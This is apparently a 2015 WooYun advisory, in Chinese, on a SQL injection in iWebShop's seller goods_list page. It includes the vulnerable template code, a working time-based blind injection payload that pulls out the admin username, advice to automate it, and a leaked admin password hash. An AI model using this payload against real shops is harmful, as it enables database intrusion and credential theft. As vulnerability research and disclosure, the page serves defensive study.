Iwebshop最新版注入又一枚 | wooyun-2015-093637| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-093637

漏洞标题：Iwebshop最新版注入又一枚

漏洞作者：路人甲

提交时间：2015-01-28 16:49

修复时间：2015-04-28 16:50

公开时间：2015-04-28 16:50

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-01-28：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-04-28：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

Iwebshop最新版注入又一枚

详细说明：

看到wooyun上有人提了几个iweshop（2014-11-18更新）的漏洞（ WooYun: iWebShop开源电子商务系统SQL注入漏洞），去官网看了看，在2014-12-16 已更新到了 iwebshop2.9.14121000，下下来研究研究，希望不要重复。
注入一枚：POST /index.php?controller=seller&action=goods_list这个注入藏的相对比较深，在HTML文件中。POST参数中的search作为一个数组传入，search的KEY and VALUE 都过滤不完全，注入成功，文件在/controllers/seller.php的goods_list()方法中
看看代码/controllers/seller.php

//商品列表
	public function goods_list()
	{
		$this->redirect('goods_list');
	}

这段代码看似直接重向了，并没有什么参数传入，注入点在哪里呢？
然后各种跳跳跳，最后一直跟到/views/sysseller/seller/goods_list.html

{set:$seller_id = $this->seller['seller_id']}
{set:$page = IReq::get('page') ? IFilter::act(IReq::get('page'),'int') : 1}
{set:$condition = IReq::get('search');$where = '';$searchUrl='';}
{if:$condition}
	{foreach:items=$condition}
	{set:$searchUrl .='&search['.urlencode($key).']='.urlencode($item)}
	{if:$item !== ""}
		{if:$key == "go.store_nums"}
		{set:$where .= ' and '.$key.$item}
		{else:}
		{set:$where .= ' and '.$key.'"'.$item.'"'}
		{/if}
	{/if}
	{/foreach}
{/if}

condition是这样获得的$condition = IReq::get('search');，去看看IReq::get
/lib/core/util/req_class.php

public static function get($key, $type=false)
	{
		//默认方式
		if($type==false)
		{
			if(isset($_GET[$key])) return $_GET[$key];
			else if(isset($_POST[$key])) return $_POST[$key];
			else return null;
		}
		//get方式
		else if($type=='get' && isset($_GET[$key]))
			return $_GET[$key];
		//post方式
		else if($type=='post' && isset($_POST[$key]))
			return $_POST[$key];
		//无匹配
		else
			return null;
	}

没有经过任何处理，直接把GET、POST的内容传入了
测试方法：申请开店后，登录，添加一件商品，然后发送下面的post包即可。
Payload:POST提交

search[1%3d-1/**/or(select/**/if(ord(mid((select/**/admin_name/**/from/**/iwebshop_admin/**/limit
/**/0,1),1,1))%3d97,sleep(1),0))#]=test_goods_list

因为是time-based blind 注入，猜测管理员用户名的第一个字母时，若错误，延迟1s左右，如下图

若正确，延迟4s左右（与你添加的商品数量有关，可以只给自己的店铺添加一件商品）如下图

按上面的方法依次做下去（burp intruder或者自己写个脚本跑），可测试管理员用户名为：admin，密码为： f6fdffe48c908deb0f4c3bd36c032e72

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-093637

漏洞标题：Iwebshop最新版注入又一枚

相关厂商：Jooyea

漏洞作者：路人甲

提交时间：2015-01-28 16:49

修复时间：2015-04-28 16:50

公开时间：2015-04-28 16:50

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-093637

漏洞标题：Iwebshop最新版注入又一枚

相关厂商：Jooyea

漏洞作者： 路人甲

提交时间：2015-01-28 16:49

修复时间：2015-04-28 16:50

公开时间：2015-04-28 16:50

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-093637"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云